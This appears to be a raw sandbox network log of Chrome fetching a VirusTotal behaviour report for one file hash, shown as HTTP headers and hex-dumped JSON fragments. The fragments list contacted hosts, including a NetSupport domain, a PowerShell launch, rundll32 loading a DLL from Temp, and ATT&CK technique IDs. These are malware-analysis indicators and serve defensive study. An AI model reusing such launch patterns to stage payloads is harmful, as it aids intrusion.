                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTQ4MzM5MDg5NTQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc1MDAzLjQ0OA==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:45 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 2fdefeedc63a5b00fbb9cef6d3ff3838
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:45 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 159972
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:45 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:45 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 5f 43 41 50 45 20 53 61 6e 64 62 6f 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox", "type": "file_behaviour", "links": { "self": "https://www.virustotal.com/ui/file_behaviour
                                                                                                                                                                                                                    2024-04-25 19:56:45 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 65 63 75 72 65 2e 67 6c 6f 62 61 6c 73 69 67 6e 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 6f 6c 76 65 64 5f 69 70 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 31 30 34 2e 31 38 2e 32 30 2e 32 32 36 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 31 30 34 2e 31 38 2e 32 31 2e 32 32 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: { "hostname": "secure.globalsign.com", "resolved_ips": [ "104.18.20.226", "104.18.21.226" ]
                                                                                                                                                                                                                    2024-04-25 19:56:45 UTC547INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 5f 67 6f 6f 67 6c 65 63 61 73 74 2e 5f 74 63 70 2e 6c 6f 63 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 67 65 6f 2e 6e 65 74 73 75 70 70 6f 72 74 73 6f 66 74 77 61 72 65 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 6f 6c 76 65 64 5f 69 70 73 22 3a 20 5b 0a 20 20 20
                                                                                                                                                                                                                    Data Ascii: }, { "hostname": "_googlecast._tcp.local" }, { "hostname": "geo.netsupportsoftware.com", "resolved_ips": [
                                                                                                                                                                                                                    2024-04-25 19:56:45 UTC1408INData Raw: 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 31 37 32 2e 32 31 37 2e 32 31 34 2e 39 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 65 73 5f 63 72 65 61 74 65 64 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 6e 61 74 69 76 65 5c 5c 57 69 6e 64 6f 77 73 50 6f 77 65 72 53 68 65 6c 6c 5c 5c 76 31 2e 30 5c 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 5c 22 20 2d 4e 6f 50 72 6f 66 69 6c 65
                                                                                                                                                                                                                    Data Ascii: ": [ "172.217.214.94" ] } ], "processes_created": [ "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile
                                                                                                                                                                                                                    2024-04-25 19:56:45 UTC1408INData Raw: 69 63 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61 74 66 6f 72 6d 2d 63 68 61 6e 6e 65 6c 2d 68 61 6e 64 6c 65 3d 32 30 34 34 20 2d 2d 66 69 65 6c 64 2d 74 72 69 61 6c 2d 68 61 6e 64 6c 65 3d 31 39 32 30 2c 69 2c 38 32 34 39 31 33 34 39 39 36 32 33 34 32 35 35 30 35 39 2c 37 39 38 34 32 32 37 34 38 39 30 31 38 34 35 39 33 34 36 2c 32 36 32 31 34 34 20 2d 2d 76 61 72 69 61 74 69 6f 6e 73 2d 73 65 65 64 2d 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 34 30 39 2d 31 38 30 30 34 36 2e 31 38 33 30 30 30 20 2f 70 72 65 66 65 74 63 68 3a 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: ice --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2044 --field-trial-handle=1920,i,8249134996234255059,7984227489018459346,262144 --variations-seed-version=20240409-180046.183000 /prefetch:3",
                                                                                                                                                                                                                    2024-04-25 19:56:45 UTC1280INData Raw: 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 74 79 70 65 3d 75 74 69 6c 69 74 79 20 2d 2d 75 74 69 6c 69 74 79 2d 73 75 62 2d 74 79 70 65 3d 71 75 61 72 61 6e 74 69 6e 65 2e 6d 6f 6a 6f 6d 2e 51 75 61 72 61 6e 74 69 6e 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61 74 66 6f 72 6d 2d 63 68 61 6e 6e 65 6c 2d 68 61 6e 64 6c 65 3d 35 32 36 38 20 2d 2d 66 69 65 6c 64 2d 74 72 69 61 6c 2d 68 61 6e 64 6c 65 3d 31 39 32 30 2c 69 2c 38 32 34
                                                                                                                                                                                                                    Data Ascii: "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5268 --field-trial-handle=1920,i,824
                                                                                                                                                                                                                    2024-04-25 19:56:45 UTC1408INData Raw: 5c 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 50 73 66 52 75 6e 44 6c 6c 36 34 2e 65 78 65 5c 22 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 74 65 6d 33 32 5c 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 5c 22 20 5c 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 50 73 66 52 75 6e 74 69 6d 65 33 32 2e 64 6c 6c 5c 22 2c 23 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 74 65 6d 33 32 5c 5c 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 0a 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: \"C:\\Users\\<USER>\\AppData\\Local\\Temp\\PsfRunDll64.exe\"", "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Users\\<USER>\\AppData\\Local\\Temp\\PsfRuntime32.dll\",#1", "C:\\Windows\\system32\\services.exe",
                                                                                                                                                                                                                    2024-04-25 19:56:45 UTC1408INData Raw: 54 65 6d 70 5c 5c 56 46 53 2f 50 72 6f 67 72 61 6d 46 69 6c 65 73 58 36 34 2f 50 73 66 52 75 6e 44 6c 6c 36 34 2e 65 78 65 5c 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 72 76 69 63 65 73 5f 73 74 61 72 74 65 64 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 57 53 65 61 72 63 68 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 42 49 54 53 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 47 6f 6f 67 6c 65 43 68 72 6f 6d 65 45 6c 65 76 61 74 69 6f 6e 53 65 72 76 69 63 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 53 65 63 75 72 69 74 79 48 65 61 6c 74 68 53 65 72 76 69 63 65
                                                                                                                                                                                                                    Data Ascii: Temp\\VFS/ProgramFilesX64/PsfRunDll64.exe\"" ], "services_started": [ "WSearch", "BITS", "GoogleChromeElevationService", "SecurityHealthService
                                                                                                                                                                                                                    2024-04-25 19:56:45 UTC1280INData Raw: 65 20 70 72 69 6d 61 72 79 20 75 73 65 72 2c 20 63 75 72 72 65 6e 74 6c 79 20 6c 6f 67 67 65 64 20 69 6e 20 75 73 65 72 2c 20 73 65 74 20 6f 66 20 75 73 65 72 73 20 74 68 61 74 20 63 6f 6d 6d 6f 6e 6c 79 20 75 73 65 73 20 61 20 73 79 73 74 65 6d 2c 20 6f 72 20 77 68 65 74 68 65 72 20 61 20 75 73 65 72 20 69 73 20 61 63 74 69 76 65 6c 79 20 75 73 69 6e 67 20 74 68 65 20 73 79 73 74 65 6d 2e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 54 31 30 38 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 67 6e 61 74 75 72 65 5f 64 65 73
                                                                                                                                                                                                                    Data Ascii: e primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system." }, { "id": "T1082", "signature_des
                                                                                                                                                                                                                    2024-04-25 19:56:45 UTC1408INData Raw: 64 76 65 72 73 61 72 69 65 73 20 6d 61 79 20 61 62 75 73 65 20 63 6f 6d 6d 61 6e 64 20 61 6e 64 20 73 63 72 69 70 74 20 69 6e 74 65 72 70 72 65 74 65 72 73 20 74 6f 20 65 78 65 63 75 74 65 20 63 6f 6d 6d 61 6e 64 73 2c 20 73 63 72 69 70 74 73 2c 20 6f 72 20 62 69 6e 61 72 69 65 73 2e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 54 31 30 36 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 67 6e 61 74 75 72 65 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 54 68 69 73 20 74 65 63 68 6e 69 71 75 65 20 68 61 73 20 62 65 65
                                                                                                                                                                                                                    Data Ascii: dversaries may abuse command and script interpreters to execute commands, scripts, or binaries." }, { "id": "T1064", "signature_description": "**This technique has bee


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    257192.168.2.165001774.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:45 UTC562OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:46 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 554275b118338b0a3d330ca238ad4611
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:46 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:46 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    258192.168.2.165001874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:49 UTC955OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTMzMzgzNDk0NTktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc1MDA4LjQ1Mg==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:50 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 7d548af4f1155282d8e4e2a44baf4f01
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:50 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 159972
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:50 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:50 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 5f 43 41 50 45 20 53 61 6e 64 62 6f 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox", "type": "file_behaviour", "links": { "self": "https://www.virustotal.com/ui/file_behaviour
                                                                                                                                                                                                                    2024-04-25 19:56:50 UTC1408INData Raw: 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4f 42 30 30 30 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 42 30 30 30 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 42 30 30 30 31 2e 30 30 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: { "id": "OB0001" }, { "id": "B0001" }, { "id": "B0001.009" },
                                                                                                                                                                                                                    2024-04-25 19:56:50 UTC546INData Raw: 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 43 30 30 31 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 43 30 30 31 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4f 42 30 30 30 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20
                                                                                                                                                                                                                    Data Ascii: }, { "id": "C0016" }, { "id": "C0018" }, { "id": "OB0004" },
                                                                                                                                                                                                                    2024-04-25 19:56:50 UTC1408INData Raw: 20 20 20 22 69 64 22 3a 20 22 45 31 30 38 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4f 43 30 30 30 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 43 30 30 33 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 65 73 5f 74 72 65
                                                                                                                                                                                                                    Data Ascii: "id": "E1082" }, { "id": "OC0008" }, { "id": "C0036" } ], "processes_tre
